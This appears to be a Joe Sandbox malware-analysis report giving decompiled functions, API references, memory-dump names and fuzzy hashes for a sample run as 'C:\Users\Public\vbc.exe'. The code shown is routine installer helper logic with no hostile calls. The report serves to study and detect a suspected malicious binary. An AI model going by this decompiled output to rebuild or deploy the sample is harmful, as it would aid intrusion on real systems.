Download Yara Rule

C-Code - Quality: 97%

			E100018A9(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void* _t43;
				signed int _t44;
				signed int _t59;
				void _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				void* _t100;

				_t84 = __edx;
				 *0x1000406c = _a8;
				_t59 = 0;
				 *0x10004070 = _a16;
				_v12 = 0;
				_v8 = E10001243();
				_t89 = E10001311(_t41);
				_t86 = _t84;
				_t43 = E10001243();
				_t63 =  *_t43;
				_a8 = _t43;
				if(_t63 != 0x7e && _t63 != 0x21) {
					_a16 = E10001243();
					_t59 = E10001311(_t56);
					_v12 = _t84;
					GlobalFree(_a16);
					_t43 = _a8;
				}
				_t64 =  *_t43 & 0x0000ffff;
				_t100 = _t64 - 0x2f;
				if(_t100 > 0) {
					_t65 = _t64 - 0x3c;
					__eflags = _t65;
					if(_t65 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3c;
						if( *((short*)(_t43 + 2)) != 0x3c) {
							__eflags = _t86 - _v12;
							if(__eflags > 0) {
								L54:
								_t44 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t89 = _t44;
								L57:
								_t86 = _t84;
								L58:
								E10001470(_t84, _t89, _t86,  &_v76);
								E10001272( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t44 = 1;
								goto L55;
							}
							__eflags = _t89 - _t59;
							if(_t89 < _t59) {
								goto L47;
							}
							goto L54;
						}
						_t84 = _t86;
						_t44 = E10002D90(_t89, _t59, _t84);
						goto L56;
					}
					_t67 = _t65 - 1;
					__eflags = _t67;
					if(_t67 == 0) {
						__eflags = _t89 - _t59;
						if(_t89 != _t59) {
							goto L54;
						}
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L54;
						}
						goto L47;
					}
					_t68 = _t67 - 1;
					__eflags = _t68;
					if(_t68 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3e;
						if( *((short*)(_t43 + 2)) != 0x3e) {
							__eflags = _t86 - _v12;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t89 - _t59;
							if(_t89 <= _t59) {
								goto L54;
							}
							goto L47;
						}
						_t84 = _t86;
						_t44 = E10002DB0(_t89, _t59, _t84);
						goto L56;
					}
					_t70 = _t68 - 0x20;
					__eflags = _t70;
					if(_t70 == 0) {
						_t89 = _t89 ^ _t59;
						_t86 = _t86 ^ _v12;
						goto L58;
					}
					_t71 = _t70 - 0x1e;
					__eflags = _t71;
					if(_t71 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x7c;
						if( *((short*)(_t43 + 2)) != 0x7c) {
							_t89 = _t89 | _t59;
							_t86 = _t86 | _v12;
							goto L58;
						}
						__eflags = _t89 | _t86;
						if((_t89 | _t86) != 0) {
							goto L47;
						}
						__eflags = _t59 | _v12;
						if((_t59 | _v12) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t71 == 0;
					if(_t71 == 0) {
						_t89 =  !_t89;
						_t86 =  !_t86;
					}
					goto L58;
				}
				if(_t100 == 0) {
					L21:
					__eflags = _t59 | _v12;
					if((_t59 | _v12) != 0) {
						_v24 = E10002C20(_t89, _t86, _t59, _v12);
						_v20 = _t84;
						_t89 = E10002CD0(_t89, _t86, _t59, _v12);
						_t43 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t84 = _t86;
					}
					__eflags =  *_t43 - 0x2f;
					if( *_t43 != 0x2f) {
						goto L57;
					} else {
						_t89 = _v24;
						_t86 = _v20;
						goto L58;
					}
				}
				_t76 = _t64 - 0x21;
				if(_t76 == 0) {
					_t44 = 0;
					__eflags = _t89 | _t86;
					if((_t89 | _t86) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t77 = _t76 - 4;
				if(_t77 == 0) {
					goto L21;
				}
				_t78 = _t77 - 1;
				if(_t78 == 0) {
					__eflags =  *((short*)(_t43 + 2)) - 0x26;
					if( *((short*)(_t43 + 2)) != 0x26) {
						_t89 = _t89 & _t59;
						_t86 = _t86 & _v12;
						goto L58;
					}
					__eflags = _t89 | _t86;
					if((_t89 | _t86) == 0) {
						goto L54;
					}
					__eflags = _t59 | _v12;
					if((_t59 | _v12) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t79 = _t78 - 4;
				if(_t79 == 0) {
					_t44 = E10002BE0(_t89, _t86, _t59, _v12);
					goto L56;
				} else {
					_t80 = _t79 - 1;
					if(_t80 == 0) {
						_t89 = _t89 + _t59;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t80 == 0) {
							_t89 = _t89 - _t59;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L58;
				}
			}

0x100018a9
0x100018b3
0x100018bc
0x100018bf
0x100018c4
0x100018cd
0x100018d6
0x100018d8
0x100018da
0x100018df
0x100018e2
0x100018e9
0x100018f7
0x10001900
0x10001905
0x10001908
0x1000190e
0x1000190e
0x10001911
0x10001914
0x10001917
0x100019df
0x100019df
0x100019e2
0x10001a4d
0x10001a52
0x10001a61
0x10001a64
0x10001a6c
0x10001a6c
0x10001a6c
0x10001a6e
0x10001a6e
0x10001a6f
0x10001a6f
0x10001a71
0x10001a71
0x10001a73
0x10001a79
0x10001a82
0x10001a93
0x10001a9e
0x10001a9e
0x10001a66
0x10001a48
0x10001a48
0x10001a4a
0x10001a4a
0x00000000
0x10001a4a
0x10001a68
0x10001a6a
0x00000000
0x00000000
0x00000000
0x10001a6a
0x10001a56
0x10001a5a
0x00000000
0x10001a5a
0x100019e4
0x100019e4
0x100019e5
0x10001a3f
0x10001a41
0x00000000
0x00000000
0x10001a43
0x10001a46
0x00000000
0x00000000
0x00000000
0x10001a46
0x100019e7
0x100019e7
0x100019e8
0x10001a1e
0x10001a23
0x10001a32
0x10001a35
0x00000000
0x00000000
0x10001a37
0x00000000
0x00000000
0x10001a39
0x10001a3b
0x00000000
0x00000000
0x00000000
0x10001a3d
0x10001a27
0x10001a2b
0x00000000
0x10001a2b
0x100019ea
0x100019ea
0x100019ed
0x10001a17
0x10001a19
0x00000000
0x10001a19
0x100019ef
0x100019ef
0x100019f2
0x100019fe
0x10001a03
0x10001a10
0x10001a12
0x00000000
0x10001a12
0x10001a05
0x10001a07
0x00000000
0x00000000
0x10001a09
0x10001a0c
0x00000000
0x00000000
0x00000000
0x10001a0e
0x100019f5
0x100019f6
0x100019f8
0x100019fa
0x100019fa
0x00000000
0x100019f6
0x1000191d
0x10001996
0x10001998
0x1000199b
0x100019b7
0x100019ba
0x100019c5
0x100019c7
0x1000199d
0x1000199d
0x100019a1
0x100019a5
0x100019a5
0x100019ca
0x100019ce
0x00000000
0x100019d4
0x100019d4
0x100019d7
0x00000000
0x100019d7
0x100019ce
0x1000191f
0x10001922
0x10001987
0x10001989
0x1000198b
0x00000000
0x00000000
0x00000000
0x10001991
0x10001924
0x10001927
0x00000000
0x00000000
0x10001929
0x1000192a
0x10001960
0x10001965
0x1000197d
0x1000197f
0x00000000
0x1000197f
0x10001967
0x10001969
0x00000000
0x00000000
0x1000196f
0x10001972
0x00000000
0x00000000
0x00000000
0x10001978
0x1000192c
0x1000192f
0x10001956
0x00000000
0x10001931
0x10001931
0x10001932
0x10001946
0x10001948
0x10001934
0x10001936
0x1000193c
0x1000193e
0x1000193e
0x10001936
0x00000000
0x10001932

APIs

GlobalFree.KERNEL32(?), ref: 10001908
GlobalFree.KERNEL32(?), ref: 10001A93
GlobalFree.KERNEL32(?), ref: 10001A98

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000,?,00000000,10002148,?,00000808), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00405BC6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405BC6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405bc7
0x00405bd4
0x00405bd5
0x00405be0
0x00405be8
0x00405be8
0x00405bf0

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
CharPrevW.USER32(?,00000000), ref: 00405BD6
lstrcatW.KERNEL32 ref: 00405BE8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE

Uniqueness

Uniqueness Score: -1.00%

Function 00403D31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403D31(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = L"1033";
				_t13 = 0xffff;
				_t6 = E00406172(__ecx, L"1033");
				while(1) {
					_t26 =  *0x42a284;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42a250 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42a280;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x429220 = _t18[1];
					 *0x42a2e8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42921c = _t23;
						E00406159(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextW( *0x423708, E00406234(_t13, _t24, _t26, 0x429240, 0xfffffffe));
						_t11 =  *0x42a26c;
						_t27 =  *0x42a268;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00406234(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x818;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403d35
0x00403d3a
0x00403d40
0x00403d45
0x00403d45
0x00403d4d
0x00000000
0x00000000
0x00403d55
0x00403d5d
0x00403d5f
0x00403d65
0x00403d65
0x00403d67
0x00403d73
0x00000000
0x00000000
0x00403d77
0x00000000
0x00000000
0x00000000
0x00403d79
0x00403d7e
0x00403d87
0x00403d8d
0x00403d92
0x00403da6
0x00403db1
0x00403dc9
0x00403dcf
0x00403dd4
0x00403ddc
0x00403dfd
0x00403dfd
0x00403dfd
0x00403dde
0x00403de0
0x00403de0
0x00403de4
0x00403deb
0x00403deb
0x00403df0
0x00403df6
0x00403df6
0x00000000
0x00403de0
0x00403d94
0x00403d99
0x00403da2
0x00403d9b
0x00403d9b
0x00403d9b
0x00403d99

APIs

SetWindowTextW.USER32 ref: 00403DC9

Strings

"C:\Users\Public\vbc.exe" , xrefs: 00403D32
1033, xrefs: 00403D35, 00403D3F, 00403DB0

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\Public\vbc.exe" $1033
API String ID: 530164218-2130053295
Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405CCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405CCE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406212(0x425f30, _a4);
				_t21 = E00405C71(0x425f30);
				if(_t21 != 0) {
					E004064A6(_t21);
					if(( *0x42a258 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f30 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f30);
							_push(0x425f30);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406555();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C12(0x425f30);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405cda
0x00405ce5
0x00405ce9
0x00405cf0
0x00405cfc
0x00405d0c
0x00405d0e
0x00405d26
0x00405d27
0x00405d2e
0x00405d2f
0x00000000
0x00000000
0x00405d12
0x00405d19
0x00405d21
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d19
0x00405d31
0x00000000
0x00405d45
0x00405cfe
0x00405d04
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405ceb
0x00000000

APIs

Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F

Part of subcall function 00405C71: CharNextW.USER32(?), ref: 00405C7F
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,7556D4C4,?,755513E0,00405A23,?,7556D4C4,755513E0,00000000), ref: 00405D27
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,7556D4C4,?,755513E0,00405A23,?,7556D4C4,755513E0), ref: 00405D37

Strings

0_B, xrefs: 00405CD4

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405C12(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405c13
0x00405c1d
0x00405c20
0x00405c26
0x00405c27
0x00405c28
0x00405c30
0x00000000
0x00000000
0x00000000
0x00405c30
0x00405c32
0x00405c3a

APIs

lstrlenW.KERNEL32(80000000,C:\Users\Public,00402F41,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003), ref: 00405C18
CharPrevW.USER32(80000000,00000000), ref: 00405C28

Strings

C:\Users\Public, xrefs: 00405C12

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\Public
API String ID: 2709904686-2272764151
Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

